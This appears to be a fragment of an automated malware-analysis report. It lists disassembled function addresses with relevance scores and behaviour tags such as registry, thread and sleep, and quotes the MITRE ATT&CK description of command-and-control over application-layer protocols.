Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre